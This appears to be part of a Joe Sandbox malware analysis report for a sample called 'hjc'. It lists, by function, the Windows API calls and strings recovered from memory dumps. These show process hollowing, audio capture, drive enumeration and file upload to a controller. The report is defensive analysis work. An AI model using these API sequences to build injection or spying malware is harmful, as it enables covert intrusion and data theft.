                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 15CB8136
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8139
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 15CB814A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB814D
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 15CB815E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8161
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 15CB8172
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CB8175
                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 15CB8217
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 15CB822F
                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 15CB8245
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 15CB826B
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 15CB82ED
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15CB8301
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 15CB8341
                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 15CB840B
                                                                                                                                                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 15CB8428
                                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 15CB8435
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 15CB844C
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 15CB8457
                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15CB8472
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CB847A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                    • API String ID: 4188446516-3035715614
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0323D259
                                                                                                                                                                                      • Part of subcall function 0323D224: GetProcAddress.KERNEL32(00000000), ref: 0323D23D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 15CBB13C
                                                                                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 15CBB150
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,15D060A4), ref: 15CBB178
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 15CBB18E
                                                                                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 15CBB1CF
                                                                                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 15CBB1E7
                                                                                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 15CBB1FC
                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 15CBB219
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 15CBB22A
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15CBB23A
                                                                                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 15CBB25C
                                                                                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 15CBB266
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                                    • API String ID: 738084811-1354618412
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15CA1AD9
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 15CA1B03
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 15CA1B13
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 15CA1B23
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 15CA1B33
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 15CA1B43
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 15CA1B54
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AAA,00000002,00000000,00000000), ref: 15CA1B65
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AAC,00000004,00000000,00000000), ref: 15CA1B75
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 15CA1B85
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 15CA1B96
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,15D12AB6,00000002,00000000,00000000), ref: 15CA1BA7
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 15CA1BB7
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 15CA1BC7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Write$Create
                                                                                                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 15CBC036
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 15CBC04E
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 15CBC067
                                                                                                                                                                                    • FindFirstVolumeW.KERNEL32 ref: 15CBC0A2
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 15CBC0B5
                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 15CBC0F9
                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 15CBC114
                                                                                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 15CBC12C
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 15CBC13B
                                                                                                                                                                                    • FindVolumeClose.KERNEL32 ref: 15CBC15B
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CBC173
                                                                                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 15CBC1A0
                                                                                                                                                                                    • lstrcatW.KERNEL32 ref: 15CBC1B9
                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 15CBC1C8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CBC1D0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 03246E9A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EAB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EBB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246ECB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EDB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects,00000000,CoReleaseServerProcess,00000000,CoAddRefServerProcess,00000000,CoInitializeEx,00000000,CoCreateInstanceEx,ole32.dll), ref: 03246EEB
                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 03246EFB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 15CF130A
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF051F
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0531
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0543
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0555
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0567
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF0579
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF058B
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF059D
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05AF
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05C1
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05D3
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05E5
                                                                                                                                                                                      • Part of subcall function 15CF0502: _free.LIBCMT ref: 15CF05F7
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF12FF
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1321
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1336
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1341
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1363
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1376
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1384
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF138F
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13C7
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13CE
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF13EB
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF1403
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 15CA8CE3
                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 15CA8D1B
                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 15CA8D4D
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 15CA8E70
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 15CA8E8B
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8F64
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8FAE
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA8FFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                                                                                                    • API String ID: 3086580692-2596673759
                                                                                                                                                                                    • Opcode ID: 3981442b72a02c8e57059b5b9013411d1d93afbf009fdbb88178ae1c0b4c6f11
                                                                                                                                                                                    • Instruction ID: 03fa7dbab317be0520cbc9c095bf977f8b961037f1252ced581c7fdf2fc0772f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3981442b72a02c8e57059b5b9013411d1d93afbf009fdbb88178ae1c0b4c6f11
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B1803A6083529BC714DF64CC90AAFBBE6AFC4254F404D1DF58A92290FF70B909CB52
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • connect.WS2_32(FFFFFFFF,?,?), ref: 15CA48E0
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15CA4A00
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 15CA4A0E
                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 15CA4A21
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                    • API String ID: 994465650-2151626615
                                                                                                                                                                                    • Opcode ID: b6e783350524958a44aeb651753b1b3a84ba2c4ba6099ee85569b4bb5f7d78c3
                                                                                                                                                                                    • Instruction ID: f46c0f60b51905c4aab2f9b56c86983d65e8a61050c0204f9517f8e21a218a48
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6e783350524958a44aeb651753b1b3a84ba2c4ba6099ee85569b4bb5f7d78c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: EC41B47BB001176BDA14BFBACD9586DBE5AFB41140B804959D80347A45FF12BC24CBE3
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,15D14EF8,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E38
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E43
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4E4C
                                                                                                                                                                                    • closesocket.WS2_32(FFFFFFFF), ref: 15CA4E5A
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4E91
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EA2
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EA9
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4EBA
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4EBF
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4EC4
                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4ED1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA4ED6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
